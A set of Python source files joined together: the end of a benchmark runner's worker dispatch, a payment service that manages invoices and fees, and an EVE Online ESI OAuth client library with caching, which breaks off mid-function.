# If the module was loaded but doesn't actually have a constructor
# of the right name, then the definition is broken
if status == InstantiationStatus.NO_CONSTRUCTOR:
raise Exception("%s.%s(%s): error: the module '%s' does not"
" expose the named constructor" % (
df.module, df.constructor,
df.arguments, df.module))
if status == InstantiationStatus.NO_MODULE:
# If the module couldn't be loaded (presumably because
# of a missing dependency), print a warning and remove
# this definition from the list of things to be run
logging.warning("%s.%s(%s): the module '%s' could not be "
"loaded; skipping" % (df.module, df.constructor,
df.arguments, df.module))
return False
else:
return True
definitions = [d for d in definitions if _test(d)]
if not args.run_disabled:
if len([d for d in definitions if d.disabled]):
logger.info(f'Not running disabled algorithms {[d for d in definitions if d.disabled]}')
definitions = [d for d in definitions if not d.disabled]
if args.max_n_algorithms >= 0:
definitions = definitions[:args.max_n_algorithms]
if len(definitions) == 0:
raise Exception('Nothing to run')
else:
logger.info(f'Order: {definitions}')
if args.parallelism > multiprocessing.cpu_count() - 1:
raise Exception('Parallelism larger than %d! (CPU count minus one)' % (multiprocessing.cpu_count() - 1))
# Multiprocessing magic to farm this out to all CPUs
queue = multiprocessing.Queue()
for definition in definitions:
queue.put(definition)
if args.batch and args.parallelism > 1:
raise Exception(f"Batch mode uses all available CPU resources, --parallelism should be set to 1. (Was: {args.parallelism})")
workers = [multiprocessing.Process(target=run_worker, args=(i+1, args, queue))
for i in range(args.parallelism)]
[worker.start() for worker in workers]
[worker.join() for worker in workers]
# TODO: need to figure out cleanup handling here
|
payment_service.py
|
# Copyright © 2019 Province of British Columbia
#
# Licensed under the Apache License, Version 2.0 (the 'License');
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an 'AS IS' BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Service class to control all the operations related to Payment."""
from threading import Thread
from typing import Any, Dict, Tuple
from flask import copy_current_request_context, current_app
from pay_api.exceptions import BusinessException
from pay_api.factory.payment_system_factory import PaymentSystemFactory
from pay_api.utils.constants import EDIT_ROLE
from pay_api.utils.enums import InvoiceReferenceStatus, InvoiceStatus, LineItemStatus, PaymentMethod, PaymentStatus
from pay_api.utils.errors import Error
from pay_api.utils.util import get_str_by_path
from .base_payment_system import PaymentSystemService
from .fee_schedule import FeeSchedule
from .invoice import Invoice
from .invoice_reference import InvoiceReference
from .payment import Payment
from .payment_account import PaymentAccount
from .payment_line_item import PaymentLineItem
from .payment_transaction import PaymentTransaction
class PaymentService: # pylint: disable=too-few-public-methods
"""Service to manage Payment related operations."""
@classmethod
def create_invoice(cls, payment_request: Tuple[Dict[str, Any]], authorization: Tuple[Dict[str, Any]]) -> Dict:
# pylint: disable=too-many-locals, too-many-statements
"""Create payment related records.
Does the following;
1. Calculate the fees based on the filing types received.
2. Check if the payment account exists,
2.1 If yes, use the one from database.
2.2 Else create one in payment system and update database.
3. Create payment record in database and flush.
4. Create invoice record in database and flush.
5. Create payment line items in database and flush.
6. Create invoice in payment system;
6.1 If successful update the invoice table with references from payment system.
6.1.1 If failed adjust the invoice to zero and roll back the transaction.
6.2 If fails rollback the transaction
"""
current_app.logger.debug('<create_invoice', payment_request)
business_info = payment_request.get('businessInfo')
filing_info = payment_request.get('filingInfo')
account_info = payment_request.get('accountInfo', None)
filing_id = filing_info.get('filingIdentifier', None)
folio_number = filing_info.get('folioNumber', get_str_by_path(authorization, 'business/folioNumber'))
corp_type = business_info.get('corpType', None)
payment_account = cls._find_payment_account(authorization)
payment_method = _get_payment_method(payment_request, payment_account)
bcol_account = cls._get_bcol_account(account_info, payment_account)
# Calculate the fees
current_app.logger.debug('Calculate the fees')
fees = _calculate_fees(corp_type, filing_info)
# Create payment system instance from factory
current_app.logger.debug('Creating PaymentSystemService impl')
pay_service: PaymentSystemService = PaymentSystemFactory.create(
payment_method=payment_method,
corp_type=corp_type,
fees=sum(fee.total for fee in fees),
account_info=account_info,
payment_account=payment_account
)
pay_system_invoice: Dict[str, any] = None
invoice: Invoice = None
try:
current_app.logger.debug('Creating Invoice record')
invoice = Invoice()
invoice.bcol_account = bcol_account
invoice.payment_account_id = payment_account.id
invoice.cfs_account_id = payment_account.cfs_account_id
invoice.invoice_status_code = pay_service.get_default_invoice_status()
invoice.service_fees = sum(fee.service_fees for fee in fees) if fees else 0
invoice.total = sum(fee.total for fee in fees) if fees else 0
invoice.paid = 0
invoice.refund = 0
invoice.routing_slip = get_str_by_path(account_info, 'routingSlip')
invoice.filing_id = filing_id
invoice.dat_number = get_str_by_path(account_info, 'datNumber')
invoice.folio_number = folio_number
invoice.business_identifier = business_info.get('businessIdentifier')
invoice.payment_method_code = pay_service.get_payment_method_code()
invoice.corp_type_code = corp_type
invoice.details = payment_request.get('details', None)
invoice = invoice.flush()
line_items = []
for fee in fees:
current_app.logger.debug('Creating line items')
line_items.append(PaymentLineItem.create(invoice.id, fee))
current_app.logger.debug('Handing off to payment system to create invoice')
invoice_reference = pay_service.create_invoice(payment_account, line_items, invoice,
corp_type_code=invoice.corp_type_code)
current_app.logger.debug('Updating invoice record')
invoice.commit()
pay_service.complete_post_invoice(invoice, invoice_reference)
invoice = Invoice.find_by_id(invoice.id, skip_auth_check=True)
except Exception as e: # NOQA pylint: disable=broad-except
current_app.logger.error('Rolling back as error occured!')
current_app.logger.error(e)
if invoice:
invoice.rollback()
if pay_system_invoice:
pay_service.cancel_invoice(
payment_account,
pay_system_invoice.get('invoice_number'),
)
raise
current_app.logger.debug('>create_invoice')
return invoice.asdict(include_dynamic_fields=True)
@classmethod
def _find_payment_account(cls, authorization):
# find payment account
payment_account: PaymentAccount = PaymentAccount.find_account(authorization)
# If there is no payment_account it must be a request with no account (NR, Staff payment etc.)
# and invoked using a service account or a staff token
if not payment_account:
payment_method = get_str_by_path(authorization,
'account/paymentInfo/methodOfPayment') or _get_default_payment()
payment_account = PaymentAccount.create(
dict(
accountId=get_str_by_path(authorization, 'account/id'),
paymentInfo=dict(methodOfPayment=payment_method)
)
)
return payment_account
@classmethod
def _get_bcol_account(cls, account_info, payment_account: PaymentAccount):
if account_info and account_info.get('bcolAccountNumber', None):
bcol_account = account_info.get('bcolAccountNumber')
else:
bcol_account = payment_account.bcol_account
return bcol_account
@classmethod
def update_invoice(cls, invoice_id: int, payment_request: Tuple[Dict[str, Any]], is_apply_credit: bool = False):
"""Update invoice related records."""
current_app.logger.debug('<update_invoice')
invoice: Invoice = Invoice.find_by_id(invoice_id, skip_auth_check=False)
# If the call is to apply credit, apply credit and release records.
if is_apply_credit:
credit_balance: float = 0
payment_account: PaymentAccount = PaymentAccount.find_by_id(invoice.payment_account_id)
invoice_balance = invoice.total - (invoice.paid or 0)
if (payment_account.credit or 0) >= invoice_balance:
pay_service: PaymentSystemService = PaymentSystemFactory.create_from_payment_method(
invoice.payment_method_code)
# Only release records, as the actual status change should happen during reconciliation.
pay_service.apply_credit(invoice)
credit_balance = payment_account.credit - invoice_balance
invoice.paid = invoice.total
invoice.save()
elif (payment_account.credit or 0) <= invoice_balance:
invoice.paid = (invoice.paid or 0) + payment_account.credit
invoice.save()
payment_account.credit = credit_balance
payment_account.save()
else:
payment_method = get_str_by_path(payment_request, 'paymentInfo/methodOfPayment')
is_not_currently_on_ob = invoice.payment_method_code != PaymentMethod.ONLINE_BANKING.value
is_not_changing_to_cc = payment_method not in (PaymentMethod.CC.value, PaymentMethod.DIRECT_PAY.value)
# can patch only if the current payment method is OB
if is_not_currently_on_ob or is_not_changing_to_cc:
raise BusinessException(Error.INVALID_REQUEST)
# check if it has any invoice references already created
# if there is any invoice ref , send them to the invoiced credit card flow
invoice_reference = InvoiceReference.find_active_reference_by_invoice_id(invoice.id)
if invoice_reference:
invoice.payment_method_code = PaymentMethod.CC.value
else:
pay_service: PaymentSystemService = PaymentSystemFactory.create_from_payment_method(
PaymentMethod.DIRECT_PAY.value)
payment_account = PaymentAccount.find_by_id(invoice.payment_account_id)
pay_service.create_invoice(payment_account, invoice.payment_line_items, invoice,
corp_type_code=invoice.corp_type_code)
invoice.payment_method_code = PaymentMethod.DIRECT_PAY.value
invoice.save()
current_app.logger.debug('>update_invoice')
return invoice.asdict()
@classmethod
def delete_invoice(cls, invoice_id: int): # pylint: disable=too-many-locals,too-many-statements
"""Delete invoice related records.
Does the following;
1. Check if payment is eligible to be deleted.
2. Mark the payment and invoices records as deleted.
3. Publish message to queue
"""
current_app.logger.debug('<delete_invoice')
# update transaction function will update the status from PayBC
_update_active_transactions(invoice_id)
invoice: Invoice = Invoice.find_by_id(invoice_id, skip_auth_check=True)
# Create the payment system implementation
pay_service: PaymentSystemService = PaymentSystemFactory.create_from_payment_method(invoice.payment_method_code)
# set payment status as deleted
payment = Payment.find_payment_for_invoice(invoice_id)
_check_if_invoice_can_be_deleted(invoice, payment)
if payment:
payment.payment_status_code = PaymentStatus.DELETED.value
payment.flush()
# Cancel invoice
invoice_reference = InvoiceReference.find_active_reference_by_invoice_id(invoice.id)
payment_account = PaymentAccount.find_by_id(invoice.payment_account_id)
if invoice_reference:
pay_service.cancel_invoice(payment_account=payment_account, inv_number=invoice_reference.invoice_number)
invoice.invoice_status_code = InvoiceStatus.DELETED.value
for line in invoice.payment_line_items:
line.line_item_status_code = LineItemStatus.CANCELLED.value
invoice_reference.status_code = InvoiceReferenceStatus.CANCELLED.value
invoice_reference.flush()
invoice.save()
current_app.logger.debug('>delete_invoice')
@classmethod
def accept_delete(cls, invoice_id: int): # pylint: disable=too-many-locals,too-many-statements
"""Mark payment related records to be deleted."""
current_app.logger.debug('<accept_delete')
invoice: Invoice = Invoice.find_by_id(invoice_id, one_of_roles=[EDIT_ROLE])
_check_if_invoice_can_be_deleted(invoice)
invoice.payment_status_code = InvoiceStatus.DELETE_ACCEPTED.value
invoice.save()
@copy_current_request_context
def run_delete():
"""Call delete payment."""
PaymentService.delete_invoice(invoice_id)
current_app.logger.debug('Starting thread to delete invoice.')
thread = Thread(target=run_delete)
thread.start()
current_app.logger.debug('>accept_delete')
def _calculate_fees(corp_type, filing_info):
"""Calculate and return the fees based on the filing type codes."""
fees = []
service_fee_applied: bool = False
for filing_type_info in filing_info.get('filingTypes'):
current_app.logger.debug(f"Getting fees for {filing_type_info.get('filingTypeCode')} ")
fee: FeeSchedule = FeeSchedule.find_by_corp_type_and_filing_type(
corp_type=corp_type,
filing_type_code=filing_type_info.get('filingTypeCode', None),
valid_date=filing_info.get('date', None),
jurisdiction=None,
is_priority=filing_type_info.get('priority'),
is_future_effective=filing_type_info.get('futureEffective'),
waive_fees=filing_type_info.get('waiveFees'),
quantity=filing_type_info.get('quantity')
)
# If service fee is already applied, do not charge again.
if service_fee_applied:
fee.service_fees = 0
elif fee.service_fees > 0:
service_fee_applied = True
if fee.variable:
fee.fee_amount = float(filing_type_info.get('fee', 0))
if filing_type_info.get('filingDescription'):
fee.description = filing_type_info.get('filingDescription')
fees.append(fee)
return fees
def _update_active_transactions(invoice_id: int):
# update active transactions
current_app.logger.debug('<_update_active_transactions')
transaction: PaymentTransaction = PaymentTransaction.find_active_by_invoice_id(invoice_id)
if transaction:
# check existing payment status in PayBC;
PaymentTransaction.update_transaction(transaction.id, pay_response_url=None)
def _check_if_invoice_can_be_deleted(invoice: Invoice, payment: Payment = None):
if invoice.invoice_status_code in (InvoiceStatus.PAID.value, InvoiceStatus.DELETED.value,
InvoiceStatus.APPROVED.value):
raise BusinessException(Error.COMPLETED_PAYMENT)
if payment and payment.payment_status_code in (PaymentStatus.COMPLETED.value, PaymentStatus.DELETED.value):
raise BusinessException(Error.COMPLETED_PAYMENT)
def _get_payment_method(payment_request: Dict, payment_account: PaymentAccount):
# If no methodOfPayment is provided, use the one against the payment account table.
payment_method = get_str_by_path(payment_request, 'paymentInfo/methodOfPayment')
if not payment_method:
payment_method = payment_account.payment_method
if not payment_method:
payment_method = _get_default_payment()
return payment_method
def _get_default_payment() -> str:
return PaymentMethod.DIRECT_PAY.value
|
eve_simple_esi.py
|
# Thanks Qandra-Si (https://github.com/Qandra-Si) for help and basis of implementation
import urllib
import requests
import base64
import hashlib
import secrets
import sys
import time
import json
import webview
from http.server import HTTPServer, CGIHTTPRequestHandler, BaseHTTPRequestHandler
import threading
import re
import os
from jose import jwt
from jose.exceptions import ExpiredSignatureError, JWTError, JWTClaimsError
import shelve
import hashlib
class ESICacheServer:
def __init__(self,file_name='cache.db'):
self.db_file=file_name
self.db=shelve.open(self.db_file)
def Get(self,key):
if key in self.db:
return self.db[key]
return None
def Del(self,key):
del self.db[key]
def Set(self,key,data):
self.db[key]=data
def Clear(self,force=False):
if force:
self.db.close()
exts=['bak','dat','dir']
for ext in exts:
os.remove(self.db_file+"."+ext)
self.db=shelve.open(self.db_file)
else:
self.db.clear()
def Close(self):
self.db.close()
def Sync(self):
self.db.sync()
class ESIAuthWebServerRequestHandler(BaseHTTPRequestHandler):
def do_GET(self):
query=urllib.parse.parse_qs(urllib.parse.urlparse(self.path).query)
if not 'state' in query:
return
state=query['state'][0]
if not state in self.server.parent.on_success:
return
if 'code' in query:
self.server.parent.on_success[state](query)
else:
self.server.parent.on_error[state](self.path)
del self.server.parent.on_success[state]
del self.server.parent.on_error[state]
if ((len(self.server.parent.on_success) == 0 ) and ( len(self.server.parent.on_error) == 0 )):
self.server.shutdown()
class ESIAuthWebServer:
def __init__(self, local_address='localhost', port=8635):
self.local_address=local_address
self.port=port
self.on_success={}
self.on_error={}
self.WebServer=None
self.daemon=None
def reg_callback(self,state,on_success,on_error):
server_need_start=False
if ((len(self.on_success) == 0 ) and ( len(self.on_error) == 0 )):
server_need_start=True
self.on_success[state]=on_success
self.on_error[state]=on_error
if server_need_start:
self.start()
def start_server(self, local_address, port, parent):
self.WebServer = HTTPServer((local_address, port), ESIAuthWebServerRequestHandler)
self.WebServer.parent=parent
self.WebServer.serve_forever()
def start(self):
self.daemon = threading.Thread(name='daemon_server', target=self.start_server, args=(self.local_address, self.port, self))
self.daemon.setDaemon(True) # Set as a daemon so it will be killed once the main thread is dead.
self.daemon.start()
def stop(self):
self.WebServer.shutdown()
class ESIUserDataStorage:
def __init__(self,work_dir='.',file_pattern='User_Data_%.json',indent="\t"):
self.work_dir=work_dir
self.file_pattern=file_pattern
self.indent=indent
def open(self,char_name):
file_name=os.path.join(self.work_dir,self.file_pattern.replace('%',char_name))
return file_name
def read(self,char_name):
file_name=self.open(char_name)
if not os.path.exists(file_name):
return None
with open(file_name, "r") as f:
data = json.load(f)
return data
def write(self,char_name,data):
file_name=self.open(char_name)
with open(file_name, "w+") as f:
json.dump(data,f,indent=self.indent)
class ESIGUIWindow:
def __init__(self):
from webview.platforms.cef import settings
settings.update({
'persist_session_cookies': True
})
self.guilib = webview.initialize('cef')
def show(self,title, url=None, html=None, js_api=None, width=580, height=1024, x=None, y=None, resizable=True, fullscreen=False, min_size=(200, 100), hidden=False, frameless=False, easy_drag=True, minimized=False, on_top=True, confirm_close=False, background_color='#FFFFFF', transparent=False, text_select=False):
self.window=webview.create_window(title,url=url, html=html, js_api=js_api, width=width, height=height, x=x, y=y, resizable=resizable, fullscreen=fullscreen, min_size=min_size, hidden=hidden, frameless=frameless, easy_drag=easy_drag, minimized=minimized, on_top=on_top, confirm_close=confirm_close, background_color=background_color, transparent=transparent, text_select=text_select) #580 x 1024
self.window._initialize(self.guilib, False , False)
self.guilib.create_window(self.window)
def destroy(self):
self.window.destroy()
class ESI:
def __init__(self,
settings,
name=None,
gui=True,
use_cache=True,
max_consistent_try=20,
debug=False,
callback_print=None,
callback_input=None,
callback_web_server=None,
callback_saved_data=None,
callback_cache_server=None,
callback_gui_window_class=None
):
"""Prints the URL to redirect users to.
Args:
settings: (Required) settings object with client_id, client_secret etc..
name: (None) string with name for autoauth storred user
gui: (True) bool for prefer auth method
use_cache: (True) bool for use cache for requests
max_consistent_try: (20) int max try to get consistent list of pages
debug: (False) bool for print more data
callback_print: (Optional)
def callback_print(string):
...
callback_input: (Optional)
def callback_input(string_promt):
...
return str(auth_code)
callback_web_server: (Optional)
class callback_web_server(address, port):
def reg_callback(state_string, on_success_function, on_error_function):
...
callback_saved_data: (Optional)
class callback_saved_data:
def read(char_name):
...
return json.loads(saved_data)
def write(char_name,data):
saved_data=json.dumps(data)
...
callback_cache_server: (Optional)
class callback_cache_server:
def Get(key):
...
return cache[key]
def Set(key,data):
...
cache[key]=data
def Del(key):
...
def Clear():
...
def Sync():
...
def Close():
...
callback_gui_window_class:
class callback_gui_window_class:
def show(title,url):
...
def destroy()
...
"""
self.settings=self.configure(settings)
self.gui = gui
self.use_cache = use_cache
self.max_consistent_try = max_consistent_try
self.force_cache = False
self.repeat_max_try = 5
self.user_auth={}
self.refresh_token = ''
self.access_token = ''
self.expired = -1
self.auth_code = ''
self.random = ''
self.unique_state = ''
self.last_map_action=None
self.last_map_action_priority=['stop','skip']
self.window = None
self.WebServer = None
self.session = requests.Session()
self.debug = debug
self.p=print
self.i=input
if callable(callback_print):
self.p=callback_print
if callable(callback_input):
self.i=callback_input
if callable(callback_web_server):
self.web_server=callback_web_server(local_address=self.settings['local_address'], port=self.settings['port'])
else:
self.web_server=ESIAuthWebServer(local_address=self.settings['local_address'], port=self.settings['port'])
if callable(callback_cache_server):
self.cache=callback_cache_server()
else:
self.cache=ESICacheServer()
if callable(callback_saved_data):
self.storage=callback_saved_data
else:
self.storage=ESIUserDataStorage()
if callable(callback_gui_window_class):
self.window=callback_gui_window_class
else:
self.window=ESIGUIWindow()
if type(name) == str:
self.get(name)
def dbg(self,data,data2=None):
if self.debug:
if data2==None:
self.p(data)
else:
self.p(data,data2)
def validate_eve_jwt(self):
"""Validate a JWT token retrieved from the EVE SSO.
Args:
Returns
dict: The contents of the validated JWT token if there are no
validation errors
"""
res = self.session.get(self.settings['jwks_url'])
res.raise_for_status()
data = res.json()
try:
jwk_sets = data["keys"]
except KeyError as e:
self.p("Something went wrong when retrieving the JWK set. The returned "
"payload did not have the expected key {}. \nPayload returned "
"from the SSO looks like: {}".format(e, data))
return None
jwk_set = next((item for item in jwk_sets if item["alg"] == "RS256"))
try:
return jwt.decode(
self.access_token,
jwk_set,
algorithms=jwk_set["alg"],
issuer=self.settings['login_host']
)
except ExpiredSignatureError:
self.p("The JWT token has expired: {}")
return None
except JWTError as e:
self.p("The JWT signature was invalid: {}").format(str(e))
return None
except JWTClaimsError as e:
try:
return jwt.decode(
self.access_token,
jwk_set,
algorithms=jwk_set["alg"],
issuer=urllib.parse.urlunparse([self.settings['esi_proto'],self.settings['login_host'],'','','',''])
)
except JWTClaimsError as e:
self.p("The issuer claim was not from login.eveonline.com or "
"https://login.eveonline.com: {}".format(str(e)))
return None
def configure(self,settings):
default_settings={
'content_type':"application/x-www-form-urlencoded",
'login_host':"login.eveonline.com",
'base_auth_url':"https://login.eveonline.com/v2/oauth/authorize/",
'token_req_url':"https://login.eveonline.com/v2/oauth/token",
'jwks_url':'https://login.eveonline.com/oauth/jwks',
'gui_auth_window_name':'Login in EVE',
'user_agent':"eve-simple-esi library",
'esi_url':"esi.evetech.net/latest",
'esi_proto':"https",
'scopes':[],
'port':8635,
'local_address':'localhost'
}
default_settings.update(settings)
default_settings['scopes']=self.combine_client_scopes(default_settings['scopes'])
return default_settings
def combine_client_scopes(self,scopes):
return " ".join(scopes)
def auth_url(self,code_challenge=None):
"""Prints the URL to redirect users to.
Args:
code_challenge: A PKCE code challenge
"""
self.unique_state = base64.urlsafe_b64encode(secrets.token_bytes(8)).decode().replace("=", "")
params = {
"response_type": "code",
"redirect_uri": self.settings['client_callback_url'],
"client_id": self.settings['client_id'],
"scope": self.settings['scopes'],
"state": self.unique_state
}
if code_challenge:
params.update({
"code_challenge": code_challenge,
"code_challenge_method": "S256"
})
string_params = urllib.parse.urlencode(params)
full_auth_url = "{}?{}".format(self.settings['base_auth_url'], string_params)
self.full_auth_url = full_auth_url
return full_auth_url
def send_token_request(self,form_values, add_headers={}):
"""Sends a request for an authorization token to the EVE SSO.
Args:
form_values: A dict containing the form encoded values that should be
sent with the request
add_headers: A dict containing additional headers to send
Returns:
requests.Response: A requests Response object
"""
headers = {
"Content-Type": self.settings['content_type'],
"Host": self.settings['login_host']
}
if self.settings['user_agent']:
headers.update({"User-Agent": self.settings['user_agent']})
if add_headers:
headers.update(add_headers)
res = self.session.post(
self.settings['token_req_url'],
data=form_values,
headers=headers,
)
self.p("Request sent to URL {} with headers {} and form values: "
"{}\n".format(res.url, headers, form_values))
res.raise_for_status()
return res
def send_token_refresh(self):
headers = {
"Content-Type": self.settings['content_type'],
"Host": self.settings['login_host'],
}
if self.settings['user_agent']:
headers.update({"User-Agent": self.settings['user_agent']})
form_values = {
"grant_type": "refresh_token",
"refresh_token": self.refresh_token,
"client_id": self.settings['client_id'],
"scope": self.settings['scopes'] # OPTIONAL
}
self.dbg(form_values)
res = self.session.post(
self.settings['token_req_url'],
data=form_values,
headers=headers,
)
self.dbg("Request sent to URL {} with headers {} and form values: "
"{}\n".format(res.url, headers, form_values))
res.raise_for_status()
return res
def uri_hash(self,uri): # Hash based by user and uri
character_name='Unregistered'
if 'character_name' in self.user_auth:
character_name=self.user_auth['character_name']
url=list(urllib.parse.urlsplit(uri))
query=urllib.parse.parse_qs(url[3])
if 'token' in query:
del query['token']
url[3]=urllib.parse.urlencode(query)
url=urllib.parse.urlunsplit(url)
text=character_name + url# + str(hash(str(body)))
text = hashlib.md5(text.encode('utf-8')).hexdigest()
return str(text)
def http_return_obj(self,cached,status_code,data,headers,validated_headers):
res={
'cached':cached,
'data':data,
'headers':dict(headers),
'status_code':status_code,
'consistent':False,
'error':False,
'validated_headers':validated_headers
}
if ((status_code==304) and (validated_headers)) :
res['consistent']=True
elif not status_code==200:
res['error']=True
return res
def validate_headers(self,headers,validate_array):
if validate_array == None:
return True
responce=True
for field in validate_array:
if validate_array[field] is None:
continue
if not field in headers:
continue
if not validate_array[field] == headers[field]:
self.dbg('validate error',[field,validate_array[field],headers[field]])
responce=False
break
return responce
def set_cache_data(self,uri_hash,content,headers):
if self.use_cache:
json_content=self.json(content)
if json_content:
self.cache.Set(uri_hash,{'header':headers,'data':json_content})
return True
return False
def get_etag(self,etag,uri_cache):
if etag is None:
if 'Etag' in uri_cache['header']:
etag=uri_cache['header']['Etag']
return etag
def send_cached_data(self, uri, body=None, etag=None, method='GET', validate_array=None):
cached=False
uri_cache=False
uri_hash=self.uri_hash(uri)
if (not ((body is None) and (method=='GET'))): # For POST/DELETE/PUT requests and if no cache
data=self.send_esi_request_http(uri, etag=etag, body=body, method=method)
content=data.content
headers=data.headers
status_code=data.status_code
return self.http_return_obj(False,status_code,content,headers,True)
if self.use_cache: #Initialize Cache
uri_cache=self.cache.Get(uri_hash)
validated_headers=False
if not uri_cache is None:
self.dbg('validating cache data for',uri)
validated_headers=self.validate_headers(uri_cache['header'],validate_array)
if not validated_headers:
uri_cache=False
if not uri_cache: # Request without cache data
data=self.send_esi_request_http(uri, etag=etag, body=body, method=method)
content=data.content
headers=data.headers
status_code=data.status_code
self.dbg('validating request data for',uri)
validated_headers=self.validate_headers(headers,validate_array)
if ((status_code in [200]) and (validated_headers) and (self.set_cache_data(uri_hash,content,headers)) ):
self.dbg('Add to cache',uri)
elif self.force_cache: # Return data from cache without check
status_code=304
cached=True
content=json.dumps(uri_cache['data'])
headers=uri_cache['header']
else: # Request with cache data
etag=self.get_etag(etag,uri_cache)
data=self.send_esi_request_http(uri, etag=etag, body=body, method=method)
headers=data.headers
content=data.content
status_code=data.status_code
self.dbg('validating etag data for',uri)
validated_headers=self.validate_headers(headers,validate_array)
if status_code == 304:
cached=True
content=json.dumps(uri_cache['data'])
if ((status_code in [200]) and (validated_headers) and (self.set_cache_data(uri_hash,content,headers)) ):
self.dbg('Add to cache',uri)
return self.http_return_obj(cached,status_code,content,headers,validated_headers)
def send_cached_json(self, uri, body=None, etag=None, method='GET', validate_array=None):
data=self.send_cached_data(uri, body=body, etag=None, method=method, validate_array=validate_array)
d=self.json(data['data'])
if type(d) is None:
return None
return self.json(data['data'])
def json(self,data):
if data == b'':
return {}
else:
try:
res=json.loads(data)
except:
return ('json_error',data.decode('utf-8'))
return res
def send_esi_request_http(self, uri, etag, body=None, method='GET'):
headers = {
"Authorization": "Bearer {}".format(self.access_token),
}
if etag:
headers.update({"If-None-Match": etag})
if self.settings['user_agent']:
headers.update({"User-Agent": self.settings['user_agent']})
if ((body) and (method=='GET')):
method='POST'
try:
if method=='GET':
res = self.session.get(uri, headers=headers)
elif method=='POST':
headers.update({"Content-Type": "application/json"})
res = self.session.post(uri, data=body, headers=headers)
elif method=='PUT':
headers.update({"Content-Type": "application/json"})
res = self.session.put(uri, data=body, headers=headers)
elif method=='DELETE':
res = self.session.delete(uri, headers=headers)
if res.status_code==401:
self.re_auth()
res=self.send_esi_request_http(uri, etag, body, method)
#if body is None:
# res = self.session.get(uri, headers=headers)
return res
except:
self.p(sys.exc_info())
raise
def print_sso_failure(self, sso_response):
self.p("\nSomething went wrong! Here's some debug info to help you out:")
self.p("\nSent request with url: {} \nbody: {} \nheaders: {}".format(
sso_response.request.url,
sso_response.request.body,
sso_response.request.headers
))
self.p("\nSSO response code is: {}".format(sso_response.status_code))
self.p("\nSSO response JSON is: {}".format(sso_response.json()))
def auth(self):
self.p("Follow the prompts and enter the info asked for.")
url=self.auth_url(code_challenge=self.create_code_challenge())
self.auth_code = self.i(url+"\nCopy the \"code\" query parameter and enter it here: ")
return self.auth_part2()
def create_code_challenge(self):
self.random = base64.urlsafe_b64encode(secrets.token_bytes(32))
m = hashlib.sha256()
m.update(self.random)
d = m.digest()
code_challenge = base64.urlsafe_b64encode(d).decode().replace("=", "")
return code_challenge
def gui_auth(self):
self.dbg("gui_auth")
self.auth_url(code_challenge=self.create_code_challenge())
self.web_server.reg_callback(state=self.unique_state, on_success=self.success_auth_code, on_error=self.error_auth_code)
return self.open_url()
def auth_part2(self):
code_verifier = self.random
form_values = {
"grant_type": "authorization_code",
"client_id": self.settings['client_id'],
"code": self.auth_code,
"code_verifier": code_verifier
}
sso_auth_response = self.send_token_request(form_values)
if sso_auth_response.status_code == 200:
data = sso_auth_response.json()
self.access_token = data["access_token"]
self.refresh_token = data["refresh_token"]
self.expired = int(data["expires_in"]) + int(time.time())
self.validate_auth()
return self.auth_object()
else:
self.print_sso_failure(sso_auth_response)
def validate_auth(self):
validated_jwt = self.validate_eve_jwt()
self.dbg("\nThe contents of the access token are: {}".format(validated_jwt))
self.character_id = validated_jwt["sub"].split(":")[2]
self.character_name = validated_jwt["name"]
self.expired = validated_jwt["exp"]
self.settings['client_id'] = validated_jwt["azp"]
self.scope = self.combine_client_scopes(validated_jwt["scp"])
def auth_object(self):
self.user_auth={
"access_token": self.access_token,
"refresh_token":self.refresh_token,
"expired":self.expired,
"character_id":self.character_id,
"character_name":self.character_name,
"client_id":self.settings['client_id'],
"scope":self.scope
}
self.storage.write(self.character_name,self.user_auth)
return self.user_auth
def get(self,char_name):
self.user_auth=self.storage.read(char_name)
if not self.user_auth == None:
self.dbg('Character data readed')
self.access_token=self.user_auth['access_token']
self.refresh_token=self.user_auth['refresh_token']
self.expired=self.user_auth['expired']
self.character_id=self.user_auth['character_id']
self.character_name=self.user_auth['character_name']
self.settings['client_id']=self.user_auth['client_id']
self.scope=self.user_auth['scope']
return self.re_auth()
self.user_auth={}
if self.gui:
return self.gui_auth()
else:
return self.auth()
return None
def stop_web_server(self):
if self.WebServer:
self.WebServer.shutdown()
def open_url(self):
self.window.show(self.settings['gui_auth_window_name'], self.full_auth_url)
self.stop_web_server()
if self.auth_code == '':
return False
return True
def success_auth_code(self,query):
self.set_auth_code(query)
self.window.destroy()
def error_auth_code(self,query):
self.window.destroy()
self.dbg('error_auth_code',query)
def set_auth_code(self,query):
if query['state'][0] == self.unique_state:
self.dbg('Authorization server valid')
self.auth_code=query['code']
self.dbg(self.auth_part2())
def re_auth(self):
if self.refresh_token == '':
return None
if self.expired > time.time():
return self.auth_object()
sso_auth_response = self.send_token_refresh()
if sso_auth_response.status_code == 200:
data = sso_auth_response.json()
self.access_token = data["access_token"]
self.refresh_token = data["refresh_token"]
self.expired = int(data["expires_in"]) + int(time.time())
self.validate_auth()
return self.auth_object()
else:
self.print_sso_failure(sso_auth_response)
def prepare_obj_to_url(self,obj):
for param in obj:
if type(obj[param]) == list:
obj[param]=self.combine_client_scopes(obj[param])
return obj
def clear_cache(self):
self.cache.Clear()
def param_creator(self,command,params,token=False):
pattern = re.compile(r'({[^\}]+})')
splitted=pattern.split(command)
for i in range(len(splitted)):
sub = splitted[i]
if not pattern.match(sub):
continue
var=sub[1:-1:] # Remove {}
if var in params:
splitted[i]=str(params[var])
elif var in self.user_auth:
splitted[i]=str(self.user_auth[var])
else:
self.dbg('Error, no variable {} in params'.format(var))
return None
path="".join(splitted)
if token:
params.update({'token':self.refresh_token})
params=self.prepare_obj_to_url(params)
uri=urllib.parse.urlunparse([self.settings['esi_proto'],self.settings['esi_url'],path,'',urllib.parse.urlencode(params),''])
return uri
def op_single(self,command,params={},post=False,etag=None,method="GET",body=None,raw=False, validate_array=None):
result=None
repeat=True
i=0
while ((i < self.repeat_max_try) and (repeat==True)):
i=i+1
if post:
method="POST"
if not method=="GET":
repeat=False
uri=self.param_creator(command,params)
if uri is None:
return None
if raw:
result=self.send_cached_data(uri, body=body, etag=etag, method=method, validate_array=validate_array)
if not result['error']:
return self.send_cached_data(uri, body=body, etag=etag, method=method, validate_array=validate_array)
else:
result=self.send_cached_json(uri, body=body, etag=etag, method=method, validate_array=validate_array)
if not type(result) is tuple:
return result
return result
def paged_data(self,data,obj):
